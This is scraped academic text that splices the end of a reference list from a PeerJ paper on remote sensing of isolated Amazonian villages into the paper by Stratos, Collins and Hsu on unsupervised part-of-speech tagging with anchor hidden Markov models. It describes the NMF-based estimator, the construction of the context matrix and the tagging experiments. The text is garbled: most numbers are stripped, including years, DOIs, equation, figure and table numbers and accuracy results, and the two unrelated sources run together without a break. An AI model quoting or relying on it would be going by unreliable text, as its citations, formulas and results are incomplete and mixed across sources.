science : – doi . /science. . walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - x( ) - http://dx.doi.org/ . /j.isprsjprs. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /j.isprsjprs. . . http://dx.doi.org/ . /srep http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. hanski i. . metapopulation ecology. oxford: oxford university press. hemming j. . red gold: the conquest of the brazilian indians. cambridge: harvard university press. hurtado am, hill kr, kaplan h, lancaster j. . the epidemiology of infectious diseases among south american indians: a call for guidelines for ethical research. current anthropology : – doi . / . kesler dc, walker rs. . geographic distribution of isolated indigenous societies in amazonia and the efficacy of indigenous territories. plos one :e doi . /journal.pone. . khoshgoftaar tm, golawala m, van hulse j. . an empirical study of learning from imbalanced data using random forest. ieee artificial intelligence tools : – . levins r. . some demographic and genetic consequences of environmental het- erogeneity for biological control. bulletin of the entomological society of america : – . murray nj, keith da, bland lm, ferrari r, lyons mb, lucas r, pettorelli n, nicholson e. a. the role of satellite remote sensing in structured ecosystem risk assess- ments. science of the total environment : – doi . /j.scitotenv. . . . murray nj, keith da, simpson d, wilshire jh, lucas rm. b. remap: an online remote sensing application for land cover classification and monitoring. methods in ecology and evolution : – doi . / - x. . pal m. . random forest classifier for remote sensing classification. international journal of remote sensing : – doi . / . pettorelli n, laurance wf, o’brien tg, wegmann m, nagendra h, turner w. . satellite remote sensing for applied ecologists: opportunities and challenges. journal of applied ecology : – doi . / - . . pritchard sb. . the trouble with darkness: nasa’s suomi satellite images of earth at night. environmental history : – doi . /envhis/emw . rabus b, eineder m, roth a, bamler r. . the shuttle radar topography mission—a new class of digital elevation models acquired by spaceborne radar. isprs journal of photogrammetry and remote sensing : – doi . /s - ( ) - . ricardo b, ricardo f. . povos indígenas no brasil. são paulo: instituto socioambien- tal. rodriguez-galiano vf, ghimire b, rogan j, chica-olmo m, rigol-sanchez jp. . an assessment of the effectiveness of a random forest classifier for land-cover classification. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . salisbury ds, fagan c. . coca and conservation: cultivation, eradication, and traf- ficking in the amazon borderlands. geoj : – doi . /s - - -x. tyukavina a, hansen mc, potapov pv, krylov am, goetz sj. . pan-tropical hinter- land forests: mapping minimally disturbed forests. global ecology and biogeography : – doi . /geb. . walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.scitotenv. . . http://dx.doi.org/ . / - x. http://dx.doi.org/ . / http://dx.doi.org/ . / - . http://dx.doi.org/ . /envhis/emw http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.isprsjprs. . . 
http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /geb. http://dx.doi.org/ . /peerj-cs. vaz a. . isolados no brasil. política de estado: da tutela para a política de direitos— uma questão resolvida? brasília: estação gráfica. walker rs, hamilton mj. . amazonian societies on the brink of extinction. american journal of human biology : – doi . /ajhb. . walker rs, hamilton mj, groth aa. . remote sensing and conservation of isolated indigenous villages in amazonia. royal society open science ( ): doi . /rsos. . walker rs, hill kr. . protecting isolated tribes. science : doi . /science.aac . walker rs, kesler dc, hill kr. . are isolated indigenous populations headed toward extinction? plos one :e doi . /journal.pone. . wallace s. . the unconquered: in search of the amazon’s last uncontacted tribes. new york: random house llc. wessel p, smith whf. . a global, self-consistent, hierarchical, high-resolution shoreline database. journal of geophysical research : – doi . / jb . zadrozny b, langford j, abe n. . cost-sensitive learning by cost-proportionate example weighting. proceedings of the ieee international conference on data mining : – . walker and hamilton ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ajhb. http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /science.aac http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / jb http://dx.doi.org/ . /peerj-cs. unsupervised part-of-speech tagging with anchor hidden markov models karl stratos, michael collins∗ and daniel hsu department of computer science, columbia university {stratos, mcollins, djhsu}@cs.columbia.edu abstract we tackle unsupervised part-of-speech (pos) tagging by learning hidden markov models (hmms) that are particularly well-suited for the problem. these hmms, which we call an- chor hmms, assume that each tag is associ- ated with at least one word that can have no other tag, which is a relatively benign con- dition for pos tagging (e.g., “the” is a word that appears only under the determiner tag). we exploit this assumption and extend the non-negative matrix factorization framework of arora et al. ( ) to design a consistent estimator for anchor hmms. in experiments, our algorithm is competitive with strong base- lines such as the clustering method of brown et al. ( ) and the log-linear model of berg- kirkpatrick et al. ( ). furthermore, it pro- duces an interpretable model in which hidden states are automatically lexicalized by words. introduction part-of-speech (pos) tagging without supervision is a quintessential problem in unsupervised learning for natural language processing (nlp). a major ap- plication of this task is reducing annotation cost: for instance, it can be used to produce rough syntactic annotations for a new language that has no labeled data, which can be subsequently refined by human annotators. hidden markov models (hmms) are a natural choice of model and have been a workhorse for this problem. early works estimated vanilla hmms ∗currently on leave at google inc. new york. with standard unsupervised learning methods such as the expectation-maximization (em) algorithm, but it quickly became clear that they performed very poorly in inducing pos tags (merialdo, ). later works improved upon vanilla hmms by incorporat- ing specific structures that are well-suited for the task, such as a sparse prior (johnson, ) or a hard-clustering assumption (brown et al., ). in this work, we tackle unsupervised pos tagging with hmms whose structure is deliberately suitable for pos tagging. 
these hmms impose an assump- tion that each hidden state is associated with an ob- servation state (“anchor word”) that can appear un- der no other state. for this reason, we denote this class of restricted hmms by anchor hmms. such an assumption is relatively benign for pos tagging; it is reasonable to assume that each pos tag has at least one word that occurs only under that tag. for example, in english, “the” is an anchor word for the determiner tag; “laughed” is an anchor word for the verb tag. we build on the non-negative matrix factoriza- tion (nmf) framework of arora et al. ( ) to de- rive a consistent estimator for anchor hmms. we make several new contributions in the process. first, to our knowledge, there is no previous work di- rectly building on this framework to address unsu- pervised sequence labeling. second, we generalize the nmf-based learning algorithm to obtain exten- sions that are important for empirical performance (table ). third, we perform extensive experiments on unsupervised pos tagging and report competitive results against strong baselines such as the cluster- ing method of brown et al. ( ) and the log-linear transactions of the association for computational linguistics, vol. , pp. – , . action editor: hinrich schütze. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. model of berg-kirkpatrick et al. ( ). one characteristic of the approach is the imme- diate interpretability of inferred hidden states. be- cause each hidden state is associated with an obser- vation, we can examine the set of such anchor obser- vations to qualitatively evaluate the learned model. in our experiments on pos tagging, we find that an- chor observations correspond to possible pos tags across different languages (table ). this property can be useful when we wish to develop a tagger for a new language that has no labeled data; we can label only the anchor words to achieve a complete label- ing of the data. this paper is structured as follows. in section , we establish the notation we use throughout. in sec- tion , we define the model family of anchor hmms. in section , we derive a matrix decomposition al- gorithm for estimating the parameters of an anchor hmm. in section , we present our experiments on unsupervised pos tagging. in section , we discuss related works. notation we use [n] to denote the set of integers { , . . . ,n}. we use e[x] to denote the expected value of a ran- dom variable x. we define ∆m− := {v ∈ rm : vi ≥ ∀i, ∑ i vi = }, i.e., the (m− )-dimensional probability simplex. given a vector v ∈ rm, we use diag(v) ∈ rm×m to denote the diagonal matrix with v . . .vm on the main diagonal. given a matrix m ∈ rn×m, we write mi ∈ rm to denote the i-th row of m (as a column vector). the anchor hidden markov model definition . . an anchor hmm (a-hmm) is a - tuple (n,m,π,t,o,a) for positive integers n,m and functions π,t,o,a where • [n] is a set of observation states. • [m] is a set of hidden states. • π(h) is the probability of generating h ∈ [m] in the first position of a sequence. • t(h′|h) is the probability of generating h′ ∈ [m] given h ∈ [m]. • o(x|h) is the probability of generating x ∈ [n] given h ∈ [m]. • a(h) := {x ∈ [n] : o(x|h) > ∧ o(x|h′) = ∀h′ = h} is non-empty for each h ∈ [m]. in other words, an a-hmm is an hmm in which each hidden state h is associated with at least one “anchor” observation state that can be generated by, and only by, h. 
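to make the anchor condition concrete, here is a tiny hand-built emission matrix over three tags and a check that every tag has at least one anchor word, i.e., a word whose emission probability is nonzero under that tag and zero under every other tag. the vocabulary and the probability values are invented for illustration; only "the" and "laughed" as anchors of the determiner and verb tags echo the examples given above.

```python
import numpy as np

tags  = ["det", "noun", "verb"]
words = ["the", "dog", "laughed", "walks", "cat"]

# emission matrix: O[x, h] = p(word x | tag h); columns sum to 1
O = np.array([
    [1.0, 0.0, 0.0],   # "the": generated by det only      -> anchor of det
    [0.0, 0.6, 0.0],   # "dog": noun only                   -> anchor of noun
    [0.0, 0.0, 0.5],   # "laughed": verb only               -> anchor of verb
    [0.0, 0.1, 0.5],   # "walks": ambiguous (noun or verb), so not an anchor
    [0.0, 0.3, 0.0],   # "cat": noun only
])

def anchors(O):
    """for each hidden state h, the words generated by h and by no other state."""
    out = {}
    for h in range(O.shape[1]):
        only_h = (O[:, h] > 0) & (np.delete(O, h, axis=1).sum(axis=1) == 0)
        out[h] = np.flatnonzero(only_h).tolist()
    return out

a = anchors(O)
assert all(len(a[h]) > 0 for h in range(O.shape[1]))   # the anchor condition holds
print({tags[h]: [words[x] for x in xs] for h, xs in a.items()})
```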
note that the anchor condition im- plies n ≥ m. an equivalent definition of an a-hmm is given by organizing the parameters in matrix form. under this definition, an a-hmm has parameters (π,t,o) where π ∈ rm is a vector and t ∈ rm×m,o ∈ rn×m are matrices whose entries are set to: • πh = π(h) for h ∈ [m] • th′,h = t(h′|h) for h,h′ ∈ [m] • ox,h = o(x|h) for h ∈ [m],x ∈ [n] the anchor condition implies that rank(o) = m. to see this, consider the rows oa . . .oam where ah ∈ a(h). since each oah has a single non-zero entry at the h-th index, the columns of o are linearly independent. we assume rank(t) = m. an important special case of a-hmm introduced by brown et al. ( ) is defined below. under this a-hmm, every observation state is an anchor of some hidden state. definition . . a brown model is an a-hmm in which a( ) . . .a(m) partition [n]. parameter estimation for a-hmms we now derive an algorithm for learning a-hmms. the algorithm reduces the learning problem to an instance of nmf from which the model parameters can be computed in closed-form. . nmf we give a brief review of the nmf method of arora et al. ( ). (exact) nmf is the following problem: given an n × d matrix a = bc where b ∈ rn×m and c ∈ rm×d have non-negativity constraints, re- cover b and c. this problem is np-hard in general (vavasis, ), but arora et al. ( ) provide an exact and efficient method when a has the follow- ing special structure: condition . . a matrix a ∈ rn×d satisfies this condition if a = bc for b ∈ rn×m and c ∈ rm×d where anchor-nmf input: a ∈ rn×d satisfying condition . with a = bc for some b ∈ rn×m and c ∈ rm×d, value m • for h = . . .m, find a vertex ah as u ← gram-schmidt({aal}h− l= ) ah ← arg max x∈[n] ∣∣∣∣ax −uu>ax ∣∣∣∣ where gram-schmidt({aal}h− l= ) is the gram- schmidt process that orthonormalizes {aal}h− l= . • for x = . . .n, recover the x-th row of b as bx ← arg min u∈∆m− ∣∣∣∣∣ ∣∣∣∣∣ax − m∑ h= uhaah ∣∣∣∣∣ ∣∣∣∣∣ ( ) • set c = [aa . . .aam ]>. output: b and c such that b>h = b > ρ(h) and ch = cρ(h) for some permutation ρ : [m] → [m] figure : non-negative matrix factorization algorithm of arora et al. ( ). . for each x ∈ [n], bx ∈ ∆m− . i.e., each row of b defines a probability distribution over [m]. . for each h ∈ [m], there is some ah ∈ [n] such that bah,h = and bah,h′ = for all h ′ = h. . rank(c) = m. since rank(b) = rank(c) = m (by property and ), the matrix a must have rank m. note that by property , each row of a is given by a convex com- bination of the rows of c: for x ∈ [n], ax = m∑ h= bx,h ×ch furthermore, by property each h ∈ [m] has an as- sociated row ah ∈ [n] such that aah = cah . these properties can be exploited to recover b and c. a concrete algorithm for factorizing a matrix sat- isfying condition . is given in figure (arora et al., ). it first identifies a . . .am (up to some permutation) by greedily locating the row of a furthest away from the subspace spanned by the vertices selected so far. then it recovers each bx as the convex coefficients required to combine aa . . .aam to yield ax. the latter computation ( ) can be achieved with any constrained optimization method; we use the frank-wolfe algorithm (frank and wolfe, ). see arora et al. ( ) for a proof of the correctness of this algorithm. . random variables to derive our algorithm, we make use of cer- tain random variables under the a-hmm. let (x , . . . ,xn ) ∈ [n]n be a random sequence of n ≥ observations drawn from the model, along with the corresponding hidden state sequence (h , . . . 
,hn ) ∈ [m]n ; independently, pick a posi- tion i ∈ [n − ] uniformly at random. let yi ∈ rd be a d-dimensional vector which is conditionally in- dependent of xi given hi, i.e., p(yi|hi,xi) = p(yi|hi). we will provide how to define such a variable in section . . : yi will be a function of (x , . . . ,xn ) serving as a “context” representation of xi revealing the hidden state hi. define unigram probabilities u∞,u ∈ rn and bigram probabilities b ∈ rn×n where u∞x := p(xi = x) ∀x ∈ [n] u x := p(xi = x|i = ) ∀x ∈ [n] bx,x′ := p(xi = x,xi+ = x′) ∀x,x′ ∈ [n] additionally, define π̄ ∈ rm where π̄h = p(hi = h) ∀h ∈ [m] ( ) we assume π̄h > for all h ∈ [m]. . derivation of a learning algorithm the following proposition provides a way to use the nmf algorithm in figure to recover the emission parameters o up to scaling. proposition . . let xi ∈ [n] and yi ∈ rd be respectively an observation and a context vector drawn from the random process described in sec- tion . . define a matrix Ω ∈ rn×d with rows Ωx = e[yi|xi = x] ∀x ∈ [n] ( ) if rank(Ω) = m, then Ω satisfies condition . : Ω = õΘ where õx,h = p(hi = h|xi = x) and Θh = e[yi|hi = h]. proof. e[yi|xi = x] = m∑ h= p(hi = h|xi = x) × e[yi|hi = h,xi = x] = m∑ h= p(hi = h|xi = x) × e[yi|hi = h] the last equality follows by the conditional inde- pendence of yi. this shows Ω = õΘ. by the an- chor assumption of the a-hmm, each h ∈ [m] has at least one x ∈ a(h) such that p(hi = h|xi = x) = , thus Ω satisfies condition . . a useful interpretation of Ω in proposition . is that its rows Ω . . . Ωn are d-dimensional vec- tor representations of observation states forming a convex hull in rd. this convex hull has m ver- tices Ωa . . . Ωam corresponding to anchors ah ∈ a(h) which can be convexly combined to realize all Ω . . . Ωn. given õ, we can recover the a-hmm parameters as follows. first, we recover the stationary state dis- tribution π̄ as: π̄h = ∑ x∈[n] p(hi = h|xi = x) ×p(xi = x) = ∑ x∈[n] õx,h ×u∞x the emission parameters o are given by bayes’ the- orem: ox,h = p(hi = h|xi = x) ×p(xi = x)∑ x∈[n] p(hi = h|xi = x) ×p(xi = x) = õx,h ×u∞x π̄h using the fact that the emission probabilities are position-independent, we see that the initial state distribution π satisfies u = oπ: u x = p(xi = x|i = ) = ∑ h∈[m] p(xi = x|hi = h,i = ) ×p(hi = h|i = ) = ∑ h∈[m] ox,h ×πh learn-anchor-hmm input: Ω in proposition . , number of hidden states m, bigram probabilities b, unigram probabilities u∞,u • compute (õ, Θ) ← anchor-nmf(Ω,m). • recover the parameters: π̄ ← õ>u∞ ( ) o ← diag(π̄)− diag(u∞)õ ( ) π = o+u ( ) t ← (diag(π̄)− o+b(o>)+)> ( ) output: a-hmm parameters (π,t,o) figure : nmf-based learning algorithm for a-hmms. the algorithm anchor-nmf is given in figure . thus π can be recovered as π = o+u where o+ is the moore–penrose pseudoinverse of o. fi- nally, it can be algebraically verified that b = odiag(π̄)t>o> (hsu et al., ). since all the in- volved matrices have rank m, we can directly solve for t as t = (diag(π̄)− o+b(o>)+)> figure shows the complete algorithm. as input, it receives a matrix Ω satisfying proposition . , the number of hidden states, and the probabilities of ob- served unigrams and bigrams. it first decomposes Ω using the nmf algorithm in figure . then it computes the a-hmm parameters whose solution is given analytically. the following theorem guarantees the consis- tency of the algorithm. theorem . . let (π,t,o) be an a-hmm such that rank(t) = m and π̄ defined in ( ) has strictly pos- itive entries π̄h > . 
given random variables Ω satisfying proposition . and b,u∞,u under this model, the algorithm learn-anchor-hmm in fig- ure outputs (π,t,o) up to a permutation on hid- den states. proof. by proposition . , Ω satisfies condition . with Ω = õΘ, thus õ can be recovered up to a permutation on columns with the algorithm anchor- nmf. the consistency of the recovered parameters follows from the correctness of ( – ) under the rank conditions. . . constrained optimization for π and t note that ( ) and ( ) require computing the pseu- doinverse of the estimated o, which can be expen- sive and vulnerable to sampling errors in practice. to make our parameter estimation more robust, we can explicitly impose probability constraints. we re- cover π by solving: π = arg min π′∈∆m− ∣∣∣∣u −oπ′ ∣∣∣∣ ( ) which can again be done with algorithms such as frank-wolfe. we recover t by maximizing the log likelihood of observation bigrams ∑ x,x′ bx,x′ log   ∑ h,h′∈[m] π̄hox,hth′,hox′,h′   ( ) subject to the constraint (t>)h ∈ ∆m− . since ( ) is concave in t with other parameters o and π̄ fixed, we can use em to find the global optimum. . construction of the convex hull Ω in this section, we provide several ways to construct a convex hull Ω satisfying proposition . . . . choice of the context yi in order to satisfy proposition . , we need to de- fine the context variable yi ∈ rd with two proper- ties: • p(yi|hi,xi) = p(yi|hi) • the matrix Ω with rows Ωx = e[yi|xi = x] ∀x ∈ [n] has rank m. a simple construction (arora et al., ) is given by defining yi ∈ rn to be an indicator vector for the next observation: [yi]x′ = { if xi+ = x′ otherwise ( ) the first condition is satisfied since xi+ does not depend on xi given hi. for the second condition, observe that Ωx,x′ = p(xi+ = x′|xi = x), or in matrix form Ω = diag (u∞)− b ( ) under the rank conditions in theorem . , ( ) has rank m. more generally, we can let yi be an observation (encoded as an indicator vector as in ( )) randomly drawn from a window of l ∈ n nearby observa- tions. we can either only use the identity of the cho- sen observation (in which case yi ∈ rn) or addi- tionally indicate the relative position in the window (in which case yi ∈ rnl). it is straightforward to verify that the above two conditions are satisfied un- der these definitions. clearly, ( ) is a special case with l = . . . reducing the dimension of Ωx with the definition of Ω in the previous section, the dimension of Ωx is d = o(n) which can be dif- ficult to work with when n � m. proposition . allows us to reduce the dimension as long as the fi- nal matrix retains the form in ( ) and has rank m. in particular, we can multiply Ω by any rank-m projec- tion matrix Π ∈ rd×m on the right side: if Ω sat- isfies the properties in proposition . , then so does ΩΠ with m-dimensional rows (ΩΠ)x = e[yiΠ|xi = x] since rank(Ω) = m, a natural choice of Π is the projection onto the best-fit m-dimensional subspace of the row space of Ω. we mention that previous works on the nmf- learning framework have employed various projec- tion methods, but they do not examine relative mer- its of their choices. for instance, arora et al. ( ) simply use random projection, which is convenient for theoretical analysis. cohen and collins ( ) use a projection based on canonical correlation anal- ysis (cca) without further exploration. in con- trast, we give a full comparison of valid construc- tion methods and find that the choice of Ω is crucial in practice. . . 
construction of Ω for the brown model we can formulate an alternative way to construct a valid Ω when the model is further restricted to be a brown model. since every observation is an anchor, ox ∈ rm has a single nonzero entry for every x. thus the rows defined by Ωx = ox/ ||ox|| (an in- dicator vector for the unique hidden state of x) form input: bigram probabilities b, unigram probabilities u∞, number of hidden states m, construction method τ scaled matrices: ( √ · is element-wise) b := diag (u∞)− / bdiag (u∞)− / b̃ := diag (√ u∞ )− / √ bdiag (√ u∞ )− / singular vectors: u(m) (v (m)) is an n×m matrix of the left (right) singular vectors of m corresponding to the largest m singular values • if τ = brown: set Ω ← diag (u∞)− bΠ where the projection matrix Π ∈ rn×m is given by Πi,j ∼n( , /m) if τ = random Π = v (diag (u∞)− b) if τ = best-fit Π = diag (u∞)− / v (b) if τ = cca • if τ = brown: compute the transformed emission matrix as f(o) = u(b̃) and set Ω ← diag(v)− f(o) where vx := ||f(o)x|| is the length of the x-th row of f(o). output: Ω ∈ rn×m in proposition . figure : algorithm for constructing a valid Ω with dif- ferent construction methods. for simplicity, we only show the bigram construction (context size l = ), but an extension for larger context (l > ) is straightforward. a trivial convex hull in which every point is a ver- tex. this corresponds to choosing an oracle context yi ∈ rm where [yi]h = { if hi = h otherwise it is possible to recover the brown model param- eters o up to element-wise scaling and rotation of rows using the algorithm of stratos et al. ( ). more specifically, let f(o) ∈ rn×m denote the out- put of their algorithm. then they show that for some vector s ∈ rm with strictly positive entries and an orthogonal matrix q ∈ rm×m: f(o) = o〈 / 〉diag(s)q> where o〈 / 〉 is an element-wise exponentiation of o by / . since the rows of f(o) are simply some scaling and rotation of the rows of o, using Ωx = f(o)x/ ||f(o)x|| yields a valid Ω. while we need to impose an additional assump- tion (the brown model restriction) in order to justify this choice of Ω, we find in our experiments that it performs better than other alternatives. we specu- late that this is because a brown model is rather ap- propriate for the pos tagging task; many words are indeed unambiguous with respect to pos tags (ta- ble ). also, the general effectiveness of f(o) for representational purposes has been demostrated in previous works (stratos et al., ; stratos et al., ). by restricting the a-hmm to be a brown model, we can piggyback on the proven effective- ness of f(o). figure shows an algorithm for constructing Ω with these different construction methods. for sim- plicity, we only show the bigram construction (con- text size l = ), but an extension for larger context (l > ) is straightforward as discussed earlier. the construction methods random (random projection), best-fit (projection to the best-fit subspace), and cca (cca projection) all compute ( ) and differ only in how the dimension is reduced. the construction method brown computes the transformed brown pa- rameters f(o) as the left singular vectors of a scaled covariance matrix and then normalizes its rows. we direct the reader to stratos et al. ( ) for a deriva- tion of this calculation. . . Ω with feature augmentation the x-th row of Ω is a d-dimensional vector repre- sentation of x lying in a convex set with m vertices. 
this suggests a natural way to incorporate domain- specific features: we can add additional dimensions that provide information about hidden states from the surface form of x. for instance, consider the the pos tagging task. in the simple construction ( ), the representation of word x is defined in terms of neighboring words x′: [Ωx]x′ = e [ ( xi+ = x ′) |xi = x ] where (·) ∈ { , } is the indicator function. we can augment this vector with s additional dimen- sions indicating the spelling features of x. for in- stance, the (n + )-th dimension may be defined as: [Ωx]n+ = e [ (x ends in “ing” ) |xi = x] this value will be generally large for verbs and small for non-verbs, nudging verbs closer together and away from non-verbs. the modified (n + s)- dimensional representation is followed by the usual dimension reduction. note that the spelling features are a deterministic function of a word, and we are implicitly assuming that they are independent of the word given its tag. while this is of course not true in practice, we find that these features can significantly boost the tagging performance. experiments we evaluate our a-hmm learning algorithm on the task of unsupervised pos tagging. the goal of this task is to induce the correct sequence of pos tags (hidden states) given a sequence of words (observa- tion states). the anchor condition corresponds to as- suming that each pos tag has at least one word that occurs only under that tag. . background on unsupervised pos tagging unsupervised pos tagging has long been an active area of research (smith and eisner, a; john- son, ; toutanova and johnson, ; haghighi and klein, ; berg-kirkpatrick et al., ), but results on this task are complicated by vary- ing assumptions and unclear evaluation metrics (christodoulopoulos et al., ). rather than ad- dressing multiple alternatives for evaluating unsu- pervised pos tagging, we focus on a simple and widely used metric: many-to-one accuracy (i.e., we map each hidden state to the most frequently coin- ciding pos tag in the labeled data and compute the resulting accuracy). . . better model v.s. better learning vanilla hmms are notorious for their mediocre performance on this task, and it is well known that they perform poorly largely because of model mis- specification, not because of suboptimal parameter estimation (e.g., because em gets stuck in local op- tima). more generally, a large body of work points to the inappropriateness of simple generative mod- els for unsupervised induction of linguistic structure (merialdo, ; smith and eisner, b; liang and klein, ). consequently, many works focus on using more expressive models such as log-linear models (smith and eisner, a; berg-kirkpatrick et al., ) and markov random fields (mrf) (haghighi and klein, ). these models are shown to deliver good performance even though learning is approxi- mate. thus one may question the value of having a consistent estimator for a-hmms and brown mod- els in this work: if the model is wrong, what is the point of learning it accurately? however, there is also ample evidence that hmms are competitive for unsupervised pos induc- tion when they incorporate domain-specific struc- tures. johnson ( ) is able to outperform the sophisticated mrf model of haghighi and klein ( ) on one-to-one accuracy by using a sparse prior in hmm estimation. the clustering method of brown et al. 
( ) which is based on optimizing the likelihood under the brown model (a special case of hmm) remains a baseline difficult to outperform (christodoulopoulos et al., ). we add to this evidence by demonstrating the effectiveness of a-hmms on this task. we also check the anchor assumption on data and show that the a-hmm model structure is in fact appropriate for the problem (table ).

experimental setting

we use the universal treebank dataset (version . ) which contains sentences annotated with pos tag types for languages (mcdonald et al., ). all models are trained with hidden states. we use the english portion to experiment with different hyperparameter configurations. at test time, we fix a configuration (based on the english portion) and apply it across all languages. the list of compared methods is given below:

bw: the baum-welch algorithm, an em algorithm for hmms (baum and petrie, ).

cluster: a parameter estimation scheme for hmms based on brown clustering (brown et al., ). we run the brown clustering algorithm to obtain word clusters c1 . . . cm. then we set the emission parameters o(x|h), transition parameters t(h′|h), and prior π(h) to be the maximum-likelihood estimates under the fixed clusters. (we use the implementation of liang ( ).)

anchor: our algorithm learn-anchor-hmm in figure but with the constrained optimization ( ) and ( ) for estimating π and t. (our implementation is available at https://github.com/karlstratos/anchor.)

anchor-features: same as anchor but employs the feature augmentation scheme described in section . .

log-linear: the unsupervised log-linear model described in berg-kirkpatrick et al. ( ). instead of emission parameters o(x|h), the model maintains a miniature log-linear model with a weight vector w and a feature function φ. the probability of a word x given tag h is computed as

    p(x|h) = exp(w⊤φ(x,h)) / Σ_{x′∈[n]} exp(w⊤φ(x′,h))

the model can be trained by maximizing the likelihood of observed sequences. we use l-bfgs to directly optimize this objective. this approach obtains the current state-of-the-art accuracy on the fine-grained ( tags) english wsj dataset. (we use the implementation of berg-kirkpatrick et al. ( ) (personal communication).)

we use maximum marginal decoding for hmm predictions: i.e., at each position, we predict the most likely tag given the entire sentence.

practical issues with the anchor algorithm

in our experiments, we find that anchor-nmf (figure ) tends to propose extremely rare words as anchors. a simple fix is to search for anchors only among relatively frequent words. we find that any reasonable frequency threshold works well; we use the most frequent words. note that this is not a problem if these words include anchor words corresponding to all the tags.

we must define the context for constructing Ω. we use the previous and next words (i.e., context size l = 2) marked with relative positions. thus Ω has 2n columns before dimension reduction.

table shows the performance on the english portion with different construction methods for Ω. the brown construction (τ = brown in figure ) clearly performs the best: essentially, the anchor algorithm is used to extract the hmm parameters from the cca-based word embeddings of stratos et al. ( ).

[table: many-to-one accuracy on the english data with different choices of the convex hull Ω (random, best-fit, cca, brown; see figure ). these results do not use spelling features.]

we also explore feature augmentation discussed in section . .
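a small sketch of how the raw context matrix and the weighted spelling-feature columns might be assembled before dimension reduction, as described above and detailed in the next paragraph. the variable names and the tiny feature set are illustrative, not the paper's exact implementation.

```python
# Toy assembly of the raw context matrix (previous and next words, marked by
# relative position) plus a few scaled spelling-feature columns.
import numpy as np
from collections import Counter

def raw_context_matrix(sentences, vocab, feature_weight=0.1):
    idx = {w: i for i, w in enumerate(vocab)}
    n = len(vocab)
    counts = np.zeros((n, 2 * n))            # columns: (previous word, next word)
    totals = Counter()
    for sent in sentences:
        for i, w in enumerate(sent):
            if w not in idx:
                continue
            totals[w] += 1
            if i > 0 and sent[i - 1] in idx:
                counts[idx[w], idx[sent[i - 1]]] += 1           # previous word
            if i + 1 < len(sent) and sent[i + 1] in idx:
                counts[idx[w], n + idx[sent[i + 1]]] += 1       # next word
    # row-normalize so entry (x, x') estimates E[1(context = x') | word = x]
    denom = np.array([max(totals[w], 1) for w in vocab])[:, None]
    omega = counts / denom
    # a few binary spelling indicators, scaled so they do not dominate
    spelling = np.array([[w[:1].isupper(), "-" in w,
                          any(c.isdigit() for c in w),
                          w.lower().endswith("ing")] for w in vocab], dtype=float)
    return np.hstack([omega, feature_weight * spelling])
```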
for comparison, we employ the same word features used by berg-kirkpatrick et al. ( ):

• indicators for whether a word is capitalized, contains a hyphen, or contains a digit
• suffixes of length 1, 2, and 3

we weight the norm of these extra dimensions in relation to the original dimensions: we find that a small weight (e.g., . of the norm of the original dimensions) works well. we also find that these features can sometimes significantly improve the performance. for instance, the accuracy on the english portion can be improved from . % to . % with feature augmentation.

another natural experiment is to refine the hmm parameters obtained from the anchor algorithm (or brown clusters) with a few iterations of the baum-welch algorithm. in our experiments, however, it did not significantly improve the tagging performance, so we omit this result.

tagging accuracy

table shows the many-to-one accuracy on all languages in the dataset. for the baum-welch algorithm and the unsupervised log-linear models, we report the mean and the standard deviation (in parentheses) of random restarts run for , iterations. both anchor and anchor-features compete favorably. on out of languages, anchor-features achieves the highest accuracy, often closely followed by anchor. the brown clustering estimation is also competitive and has the highest accuracy on languages. not surprisingly, vanilla hmms trained with bw perform the worst (see section . . for a discussion).

[table: many-to-one accuracy on each language (de, en, es, fr, id, it, ja, ko, pt-br, sv) using universal tags. the first four models are hmms estimated with the baum-welch algorithm (bw), the clustering algorithm of brown et al. ( ), and the anchor algorithm without (anchor) and with (anchor-features) feature augmentation. log-linear is the model of berg-kirkpatrick et al. ( ) trained with the direct-gradient method using l-bfgs. for bw and log-linear, we report the mean and the standard deviation (in parentheses) of random restarts run for , iterations.]

log-linear is a robust baseline and performs the best on the remaining languages. it performs especially strongly on the japanese and korean datasets, in which poorly segmented strings such as "年 月 日には" (on november , ) and ". %로" (by . %) abound. in these datasets, it is crucial to make effective use of morphological features.

qualitative analysis

a-hmm parameters

an a-hmm can be easily interpreted since each hidden state is marked with an anchor observation. table shows the anchors found in each language. note that these anchor words generally have a wide coverage of possible pos tags. we also experimented with using true anchor words (obtained from labeled data), but they did not improve performance over automatically induced anchors. since anchor discovery is inherently tied to parameter estimation, it is better to obtain anchors in a data-driven manner. in particular, certain pos tags (e.g., x) appear quite infrequently, and the model is worse off by being forced to allocate a hidden state for such a tag.

table shows words with the highest emission probabilities o(x|h) under each anchor. we observe that an anchor is representative of a certain group of words.
for instance, the state "loss" represents noun-like words, " " represents numbers, "on" represents preposition-like words, "one" represents determiner-like words, and "closed" represents verb-like words. the conditional distribution is peaked for anchors that represent function tags (e.g., determiners, punctuation) and flat for anchors that represent content tags (e.g., nouns). occasionally, an anchor assigns high probabilities to words that do not seem to belong to the corresponding pos tag. but this is to be expected, since o(x|h) ∝ p(xi = x) is generally larger for frequent words.

[table: anchor words found in each language (de, en, es, fr, id, it, ja, ko, pt-br, sv) under the model anchor-features.]

[table: most likely words under each anchor word (english model anchor-features); emission probabilities o(x|h) are given in parentheses.]

model assumptions on data

table checks the assumptions in a-hmms and brown models on the universal treebank dataset. the anchor assumption is indeed satisfied with universal tags: in every language, each tag has at least one word uniquely associated with the tag. the brown assumption (each word has exactly one possible tag) is of course not satisfied, since some words are genuinely ambiguous with respect to their pos tags. however, the percentage of unambiguous words is very high (well over 90%). this analysis supports that the model assumptions made by a-hmms and brown models are appropriate for pos tagging.

